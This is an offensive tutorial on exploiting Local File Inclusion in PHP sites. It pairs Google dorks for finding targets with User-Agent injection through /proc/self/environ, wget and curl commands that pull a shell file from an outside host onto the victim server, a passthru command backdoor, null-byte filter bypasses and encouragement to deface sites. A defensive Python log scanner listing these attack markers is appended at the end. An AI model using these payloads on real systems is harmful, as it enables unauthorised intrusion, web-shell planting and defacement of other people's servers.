Hello friends, today I'm publishing a tutorial on what LFI is, and how to upload a shell with Tamper Data through LFI on a vulnerable website.
LFI means Local File Inclusion; it gives you access to read files on a website/server via your browser.
Previously I published a post on LFI; you can read it here.
A URL on an LFI-vulnerable website looks like this:
Code:
www.website.com/index.php?page=/etc/passwd
Here's what the code looks like that makes it vulnerable.
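<?php
// User-controlled request parameter, taken as-is
$file = $_GET['file'];
if(isset($file))
{
// The unvalidated value goes straight into include(); this is the flaw
include("pages/$file");
}
else
{
include("index.php");
}
?>
Few Things You Need for this Method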
1. Firefox
2. Tamper Data
3. Vulnerable Sites
or use these dorks for finding vulnerable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=
Now I'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper Data.
So after selecting a vulnerable website, check /etc/passwd.
Your page should come up with something that looks like this.
Great! Now you are sure that the website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ
Your page will look like this if the file exists,
Note - not all websites have it.
I'm interested in HTTP_USER_AGENT. Now I'm going to change our user agent to try to get data from the site by injecting code where our browser's user agent should be.
To do this, I am going to use Tamper Data. Once you have it installed, go to your options, and go to Tamper Data.
Now you will get a window that looks like this.
Your page must still be /proc/self/environ.
Click Start Tamper, and refresh your page.
I'll try some code injection.
After you start tampering, you should see a window that looks like this.
In the User-Agent field, type this
<?php phpinfo();?>
Now the vulnerable website is loading,
you will see something like this if you did it correctly
Now we can execute code, so let's upload your shell.
Open Tamper Data again, click Start Tamper, and refresh the website. This time, in the User-Agent field, enter this
<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
It will look like this
It downloads the text file and renames it as a PHP file.
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting
When you're done with that, you can access your shell directly by going to http://site/shell.php
If you are getting an error, try using the same method as when you got your
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php
If it loads fine the second time, you can upload your deface using the shell... check out the best deface pages here
When you are done, you have a shell, like this <3
Alternate Method :
Some websites take extra precautions to prevent attacks like these,
so use this alternate method.
Change your user agent to:
<? passthru($_GET['cmd']); ?>
Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curlhttp://www.yoursite.com/shell.txt -o shell.php
Now hopefully your shell uploaded.
Null Bytes
Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
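Seen from the server side, the requests in this walkthrough leave clear traces: system paths in the page parameter and a PHP open tag in the User-Agent header. The detection sketch below is an added example, not part of the original tutorial; the combined log format, the marker list and every log line are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed format: Apache/nginx "combined" access log.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# Values that have no business inside a page-selection parameter.
SUSPICIOUS_VALUES = ("/proc/self/environ", "/etc/passwd", "../", "\x00")

# Constructed sample lines (documentation IP range, made-up times and sizes).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 2210 "-" "<?php phpinfo();?>"',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
]

def inspect(line):
    """Return a list of findings for one log line (empty if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    # parse_qsl percent-decodes values, so %00 and %2e%2e%2f are seen decoded.
    query = urlsplit(m["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        for marker in SUSPICIOUS_VALUES:
            if marker in value:
                findings.append(f"param {name!r} contains {marker!r}")
    # A browser never sends PHP tags; this is the /proc/self/environ injection.
    if "<?" in m["agent"]:
        findings.append("PHP open tag in User-Agent")
    return findings

def scan(lines):
    """Map 1-based line number to findings, skipping clean lines."""
    report = {}
    for number, line in enumerate(lines, start=1):
        findings = inspect(line.rstrip("\n"))
        if findings:
            report[number] = findings
    return report

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, "; ".join(findings))
```

A hit on the User-Agent rule together with a 200 response for /proc/self/environ is the combination to escalate, since it means the injected header was likely included and executed.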